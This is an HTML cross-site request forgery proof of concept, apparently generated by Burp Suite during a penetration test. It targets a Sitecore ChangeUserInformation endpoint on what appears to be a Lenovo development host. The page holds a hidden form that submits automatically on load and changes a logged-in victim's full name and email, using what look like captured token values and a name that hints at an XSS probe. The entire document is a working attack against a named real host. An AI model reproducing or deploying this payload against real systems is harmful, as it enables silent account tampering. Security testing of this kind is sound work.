<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://cm.dxp-dev.lenovo.com/sitecore/shell/default.aspx?xmlcontrol=ChangeUserInformation" method="POST">
      <input type="hidden" name="&#95;&#95;PARAMETERS" value="" />
      <input type="hidden" name="&#95;&#95;EVENTTARGET" value="OK" />
      <input type="hidden" name="&#95;&#95;EVENTARGUMENT" value="" />
      <input type="hidden" name="&#95;&#95;SOURCE" value="OK" />
      <input type="hidden" name="&#95;&#95;EVENTTYPE" value="click" />
      <input type="hidden" name="&#95;&#95;CONTEXTMENU" value="" />
      <input type="hidden" name="&#95;&#95;MODIFIED" value="1" />
      <input type="hidden" name="&#95;&#95;ISEVENT" value="1" />
      <input type="hidden" name="&#95;&#95;SHIFTKEY" value="" />
      <input type="hidden" name="&#95;&#95;CTRLKEY" value="" />
      <input type="hidden" name="&#95;&#95;ALTKEY" value="" />
      <input type="hidden" name="&#95;&#95;BUTTON" value="0" />
      <input type="hidden" name="&#95;&#95;KEYCODE" value="undefined" />
      <input type="hidden" name="&#95;&#95;X" value="374" />
      <input type="hidden" name="&#95;&#95;Y" value="571" />
      <input type="hidden" name="&#95;&#95;URL" value="https&#58;&#47;&#47;cm&#46;dxp&#45;dev&#46;lenovo&#46;com&#47;sitecore&#47;shell&#47;default&#46;aspx&#63;xmlcontrol&#61;ChangeUserInformation" />
      <input type="hidden" name="&#95;&#95;CSRFTOKEN" value="AAEAAAD&#47;&#47;&#47;&#47;&#47;AQAAAAAAAAAGAQAAACQzN2EzMjhmYy0xZmQ0LTQxNDMtYmJlNy03ZjhiNjhjOTlmYTML" />
      <input type="hidden" name="&#95;&#95;VIEWSTATE" value="343AB472B5D94A4EBD5E12A4D7DD5642" />
      <input type="hidden" name="&#95;&#95;VIEWSTATE" value="" />
      <input type="hidden" name="Fullname" value="dxpPentetsUser234xss" />
      <input type="hidden" name="Email" value="lr&#64;moc&#46;moc" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
